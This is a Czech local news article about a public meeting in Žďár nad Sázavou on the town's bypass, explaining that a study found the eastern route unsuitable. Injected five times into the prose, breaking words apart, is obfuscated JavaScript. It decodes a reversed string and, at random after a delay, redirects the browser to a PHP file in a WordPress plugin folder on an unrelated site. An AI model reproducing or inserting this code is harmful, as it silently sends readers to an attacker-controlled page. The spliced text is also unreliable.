Rainbow page separator

Setkání s občany připomene obchvat; východní trasa není vhodná

Pátek, 16. června 2023

Žďár nad Sázavou / Na středu 21. června žďárská radnice naplánovala setkání s občany na téma obchvat města, respektive analýza jeho východní varianty. Uskuteční se od 16.30 hodin v zasedací místnosti zastupitelstva. Zatímco Ředitelství silnic a dálnic ČR již několik let připravuje západní variantu obchvatu Žďáru, měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to si ve své režii nechalo ve spolupráci s dopravními experty připravit vyhledávací studii východní varianty. Ta by v délce přes šest kilometrů vedla ze silnice I/19 od Mělkovic kolem nádrže Staviště, Vysokého, Počítek a Stržanova k silnici I/37, nicméně ve hře by bylo i několik možností doplňující jižní větve směřující od Hamrů nad Sázavou přes ulice Jihlavská a Brněnská. Východní varianta obchvatu je však spojena s četnými problémy a omezeními, a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to především ve spoji$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti s ochranou životního prostředí v CHKO Žďárské vrchy, ale i nákladností či nesouhlasem obcí, kolem kterých by obchvat vedl. Vzhledem k výsledkům bylo doporučeno pokračovat s přípravou západní varianty. I ta však má četné kritiky, neboť obchvat se vzhledem k zástavbě už blíží průtahu městem – míří ze silnice I/37 kolem firmy TOKOZ a nad čtvrtí Klafar přes zahrádkářskou kolonii na okraji čtvrti Stalingrad a přes Žďár nad Sázavou 6 k nádraží. Záleží i na výsledku připravované studie ekonomické náročnosti stavby, přičemž měs$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to hodlá uplatnit námitky vůči návrhu řešení některých problematických úseků, jako je třeba průchod obchvatu Stalingradem a oblastí Přednádraží.  Na setkání budou pří$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomni i odborníci z agentury Mott MacDonald, kteří vyhledávací studii připravili a možnosti různých tras východní varianty obchvatu Žďáru prověřovali, aby zájemcům zodpověděli jejich dotazy nebo přiblížili podrobnosti včetně nejvýhodnější trasy, jež by přinesla nejschůdnější kompromis mezi všemi posuzovanými hledisky. Závěry vyhledávací studie jsou k dispozici na webu www.saarplan.cz.